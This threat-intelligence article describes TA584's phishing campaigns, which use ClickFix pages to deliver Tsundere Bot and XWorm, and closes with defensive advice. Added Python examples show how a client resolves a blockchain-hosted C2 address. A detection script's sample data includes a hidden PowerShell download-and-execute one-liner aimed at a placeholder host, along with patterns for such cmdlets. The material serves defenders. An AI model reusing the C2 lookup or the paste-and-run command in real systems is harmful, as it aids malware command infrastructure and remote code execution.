Tsundere Bot Ransomware Attacks: TA584 Shifts to New Malware Delivery Tactics

Cybersecurity researchers have observed a major shift in how initial access brokers gain entry into corporate networks. A prolific threat actor tracked as TA584 has started using a new malware strain called Tsundere Bot, alongside the well-known XWorm remote access trojan, to establish access that can later lead to ransomware attacks.

According to Proofpoint researchers, this transition marks a significant evolution in the group’s attack strategy and operational scale, with campaign volume tripling and infrastructure rotating faster than in previous years. This rapid operational change makes traditional static detection far less effective.

TA584 Expands Its Attack Operations

Proofpoint has tracked TA584 since 2020, but the group significantly increased activity during late 2025. Campaign volume reportedly tripled compared to earlier quarters, while targeting expanded beyond North America and the UK to include Germany, other European countries, and Australia.

Instead of relying on predictable attack chains, TA584 now runs continuous campaigns that rotate infrastructure, payloads, and delivery methods rapidly. This approach reduces the effectiveness of signature-based detection and increases the likelihood of successful compromise.


Proofpoint notes that this constant campaign churn allows TA584 to evade filtering systems while maintaining a high infection rate.

How the New Attack Chain Works

The current infection flow begins with phishing emails sent from hundreds of compromised email accounts. Attackers frequently deliver these messages using cloud email platforms such as SendGrid and Amazon Simple Email Service (SES) to appear legitimate.

Each email contains a unique link whose redirect chain applies several filters before the lure is served:

  • Geofencing and IP filtering to avoid automated scanners
  • Redirect chains using traffic distribution systems
  • CAPTCHA verification to validate human interaction

Once the target passes these checks, a ClickFix page appears. The page instructs the victim to manually copy and run a PowerShell command. That command downloads and executes an obfuscated script, loads either XWorm or Tsundere Bot directly into memory, and redirects the browser to a harmless site to reduce suspicion.

This hands-on social engineering works because the victim runs the command themselves: no exploit or malicious attachment is involved, so controls aimed at those vectors never fire, and the payload executes under the user's own account.

What Makes Tsundere Bot Dangerous

Tsundere Bot operates as a malware-as-a-service (MaaS) platform with both loader and backdoor capabilities. It depends on Node.js, which the malware automatically installs on infected systems.

Key capabilities include:

  • Retrieving command-and-control (C2) addresses from the Ethereum blockchain using a technique similar to EtherHiding
  • Communicating with C2 servers through WebSockets
  • Profiling infected machines for hardware and operating system details
  • Executing arbitrary JavaScript commands remotely
  • Using infected systems as SOCKS proxy nodes
  • Selling and renting bots through an integrated marketplace

The malware also checks the system language settings and aborts on machines configured with languages of the Commonwealth of Independent States (CIS) region, a common sign that the operators deliberately avoid infecting victims there.

Researchers assess with high confidence that Tsundere Bot infections can enable ransomware deployment when used by TA584.

Kaspersky Confirms Blockchain Abuse in Tsundere Bot

Kaspersky researchers independently analyzed Tsundere Bot and confirmed that the malware abuses blockchain smart contracts to store and rotate C2 addresses. Early versions spread through malicious Node.js packages and fake installers disguised as popular software and games.

The botnet continues to expand and primarily targets Windows systems, delivered through MSI installers and PowerShell scripts. The malware persists through registry entries and process managers to maintain long-term access.

This blockchain-based infrastructure complicates takedown efforts: the operators can point infections at new command servers by updating the value stored in the contract, without modifying the malware binaries, and because the contract is read through ordinary public RPC nodes there is no single attacker-controlled server for defenders to seize or sinkhole.
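
To make the EtherHiding-style lookup from the capabilities list above and from Kaspersky's findings concrete, the following is an added example written for this page, not Tsundere Bot's code and not from Proofpoint or Kaspersky. It shows the mechanics a client uses to resolve a C2 address from a smart contract: POST an eth_call JSON-RPC request to any public Ethereum node, naming the contract and a read-only function selector, then ABI-decode the returned string. The contract address, the function selector, the RPC response and the wss://c2.example.invalid URL are all constructed assumptions; the real contract and ABI are not on this page.

```python
"""EtherHiding-style C2 resolution, illustrated.

Added example for this page; not Tsundere Bot's code. The contract address,
function selector and RPC response below are constructed assumptions.
"""
import json


# Assumed values for illustration only; the real contract and selector are not on this page.
CONTRACT = "0x" + "11" * 20   # placeholder contract address
SELECTOR = "0xdeadbeef"       # placeholder 4-byte selector (keccak256 of the ABI signature in a real contract)


def build_eth_call(contract: str, selector: str, rpc_id: int = 1) -> dict:
    """Build the JSON-RPC body a client POSTs to any public Ethereum RPC node.

    eth_call executes a read-only contract function: no gas, no wallet and no
    transaction are needed, which is what makes the lookup cheap and anonymous.
    """
    return {
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def abi_encode_string(s: str) -> str:
    """ABI-encode a single `string` return value (used here to build the sample)."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + padded).hex()


def abi_decode_string(result_hex: str) -> str:
    """Decode a single ABI-encoded `string` return value.

    Layout: word 0 is the offset of the dynamic data (0x20 for one return
    value); the word at that offset is the byte length; the UTF-8 bytes follow,
    right-padded with zeros to a multiple of 32 bytes.
    """
    hexstr = result_hex[2:] if result_hex.startswith("0x") else result_hex
    raw = bytes.fromhex(hexstr)
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("malformed ABI payload")
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds payload")
    return raw[start:start + length].decode("utf-8")


def resolve_c2(rpc_response: dict) -> str:
    """Extract the C2 URL from an eth_call response and sanity-check its scheme."""
    url = abi_decode_string(rpc_response["result"])
    if not url.startswith(("ws://", "wss://")):   # the bot talks to its C2 over WebSockets
        raise ValueError(f"unexpected C2 scheme in {url!r}")
    return url


# Constructed sample response: the ABI encoding of "wss://c2.example.invalid/ws".
SAMPLE_RESPONSE = {
    "jsonrpc": "2.0",
    "id": 1,
    "result": "0x"
    + "00" * 31 + "20"                                          # offset 0x20
    + "00" * 31 + "1b"                                          # length 27
    + "7773733a2f2f63322e6578616d706c652e696e76616c69642f7773"  # "wss://c2.example.invalid/ws"
    + "00" * 5,                                                 # zero padding to 32 bytes
}


if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    print(resolve_c2(SAMPLE_RESPONSE))
```

A defender can replay the same eth_call against a public RPC node to watch the contract's current value change over time, which is also why the lookup itself is a useful network signal: ordinary workstations do not issue JSON-RPC eth_call requests.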

XWorm Remains a Secondary Payload

TA584 continues to deploy XWorm, a remote access trojan that the group runs filelessly: it is loaded straight into memory and injected into a legitimate process by process hollowing to evade traditional endpoint detection. After execution, XWorm pulls additional modules from its command servers and establishes persistence through obfuscated registry entries.

While Tsundere Bot is gaining prominence, TA584 still rotates multiple malware families based on campaign objectives. Previously observed payloads include Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, and XWorm, allowing the group to rapidly shift tooling when defenders disrupt a specific infection chain.

Proofpoint confirms that TA584 has consistently used XWorm since mid-2024 and continues pairing it with newer payloads to maintain operational flexibility.

What Security Teams Should Do Now

Researchers recommend several defensive actions to reduce exposure:

  • Restrict PowerShell execution where users do not need it, and enable script block logging so that pasted commands are recorded even when the payload only ever runs in memory.
  • Block or closely monitor node.exe execution from user-writable locations such as AppData.
  • Monitor outbound connections to Ethereum RPC endpoints and suspicious WebSocket traffic used for command-and-control communication.
  • Train employees to recognize social-engineering tactics such as fake CAPTCHA and ClickFix pages.
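
As an added illustration of the checks above (example code written for this page, not from Proofpoint, Kaspersky or any vendor product), the following Python runs three of them over constructed telemetry records: PowerShell spawned by explorer.exe with hidden-window or download-and-execute flags, which is the footprint left when a user pastes a ClickFix command into the Run dialog (if the lure tells the user to open a terminal instead, the parent process differs and the rule needs adjusting); node.exe executing from a user-writable directory such as AppData; and outbound JSON-RPC eth_call requests or WebSocket upgrades from a process that has no business opening one. The event field names, the suspicious-PowerShell patterns, the directory list and the set of processes expected to use WebSockets are assumptions to tune for your environment, and the sample events are constructed, not captured from an incident.

```python
"""Triage of the TA584 / Tsundere Bot chain over constructed telemetry.

Added example for this page, not vendor or Proofpoint code. Event field names
and the tuning lists below are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    event: dict


# Flags common in paste-and-run one-liners: hidden window, encoded command,
# download-and-execute cmdlets. Tune to your estate; admin scripts may hit these too.
PS_SUSPECT = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod)",
    re.IGNORECASE,
)
# User-writable locations from which node.exe should not be running.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE
)
# Processes that legitimately open WebSockets on a workstation (assumption).
EXPECTED_WS_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "slack.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_process(ev: dict) -> list:
    """ClickFix footprint and node.exe running from a user-writable path."""
    found = []
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    # A user pasting the lure into the Run dialog yields explorer.exe -> powershell.exe
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and PS_SUSPECT.search(cmd):
        found.append(Finding("clickfix_powershell_from_explorer", ev))
    if image == "node.exe" and USER_WRITABLE.search(ev.get("image", "")):
        found.append(Finding("node_from_user_writable_path", ev))
    return found


def check_network(ev: dict) -> list:
    """EtherHiding-style RPC lookups and WebSocket C2 from an unexpected process."""
    found = []
    body = ev.get("body", "")
    if ev.get("method") == "POST" and '"jsonrpc"' in body and '"eth_call"' in body:
        found.append(Finding("ethereum_rpc_eth_call", ev))
    headers = {k.lower(): v.lower() for k, v in ev.get("headers", {}).items()}
    if headers.get("upgrade") == "websocket" and basename(ev.get("image", "")) not in EXPECTED_WS_IMAGES:
        found.append(Finding("websocket_from_unexpected_process", ev))
    return found


def triage(events: list) -> list:
    found = []
    for ev in events:
        if ev.get("type") == "process":
            found.extend(check_process(ev))
        elif ev.get("type") == "network":
            found.extend(check_network(ev))
    return found


NODE_IN_APPDATA = r"C:\Users\alice\AppData\Roaming\nodejs\node.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not captured from a real incident).
SAMPLE_EVENTS = [
    {"type": "process", "image": POWERSHELL, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (irm http://lure.example.invalid/a)"'},
    {"type": "process", "image": POWERSHELL, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell Get-ChildItem C:\\Users\\alice\\Documents"},   # benign
    {"type": "process", "image": NODE_IN_APPDATA, "parent_image": POWERSHELL,
     "command_line": "node.exe index.js"},
    {"type": "process", "image": r"C:\Program Files\nodejs\node.exe",            # benign install
     "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe", "command_line": "node.exe build.js"},
    {"type": "network", "image": NODE_IN_APPDATA, "method": "POST", "dest": "rpc.example.invalid",
     "headers": {"Content-Type": "application/json"},
     "body": '{"jsonrpc":"2.0","id":1,"method":"eth_call","params":[{"to":"0x1111111111111111111111111111111111111111","data":"0xdeadbeef"},"latest"]}'},
    {"type": "network", "image": NODE_IN_APPDATA, "method": "GET", "dest": "c2.example.invalid",
     "headers": {"Connection": "Upgrade", "Upgrade": "websocket"}, "body": ""},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "method": "GET",
     "dest": "teams.example.invalid", "headers": {"Connection": "Upgrade", "Upgrade": "websocket"}, "body": ""},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.event.get('command_line') or f.event.get('dest')}")
```

The four findings this produces on the sample set map one-to-one onto the chain in the article: the pasted PowerShell, the Node.js runtime dropped into AppData, the contract lookup, and the WebSocket session to the C2. In production, feed the same functions from your EDR or proxy export and treat the eth_call rule as high-fidelity, since nothing in a normal office estate speaks Ethereum JSON-RPC.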

Early detection, behavioral monitoring, and user awareness remain critical against fast-moving threat actors like TA584.

TA584 shows no signs of slowing down. Researchers expect the actor to continue experimenting with new payloads and expanding geographic targeting as its infrastructure matures. As Tsundere Bot adoption expands across multiple threat groups, security teams should expect increased ransomware risk driven by blockchain-based command infrastructure and advanced fileless execution techniques.
